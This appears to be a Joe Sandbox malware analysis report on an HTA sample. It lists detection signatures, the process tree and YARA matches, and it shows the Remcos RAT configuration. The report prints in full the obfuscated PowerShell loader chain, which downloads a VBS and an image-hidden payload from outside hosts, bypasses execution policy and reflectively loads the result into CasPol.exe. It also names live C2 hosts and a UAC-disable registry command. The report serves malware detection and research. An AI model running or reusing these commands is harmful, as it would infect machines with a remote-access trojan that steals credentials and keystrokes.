Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta

Overview

General Information

Sample name:sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Analysis ID:1562937
MD5:5a9dc05899d1a19be638824e5f47b88e
SHA1:418e5c2cfc4ba40069bbcbc7373e9ff0b71740f2
SHA256:741297ecc59d39296f360b100032cdb120af2eb4ccc5b91f370c0eacb9ee7e25
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7420 cmdline: mshta.exe "C:\Users\user\Desktop\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7492 cmdline: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 7864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • CasPol.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 17 entries
          SourceRuleDescriptionAuthorStrings
          13.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            13.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              13.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                13.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6b6f8:$a1: Remcos restarted by watchdog!
                • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                13.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x65a04:$str_b2: Executing file:
                • 0x6683c:$str_b3: GetDirectListeningPort
                • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x66380:$str_b7: \update.vbs
                • 0x65a2c:$str_b9: Downloaded file:
                • 0x65a18:$str_b10: Downloading file:
                • 0x65abc:$str_b12: Failed to upload file:
                • 0x66804:$str_b13: StartForward
                • 0x66824:$str_b14: StopForward
                • 0x662d8:$str_b15: fso.DeleteFile "
                • 0x6626c:$str_b16: On Error Resume Next
                • 0x66308:$str_b17: fso.DeleteFolder "
                • 0x65aac:$str_b18: Uploaded file:
                • 0x65a6c:$str_b19: Unable to delete:
                • 0x662a0:$str_b20: while fso.FileExists("
                • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                amsi32_7492.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                  amsi32_8032.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRT
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = 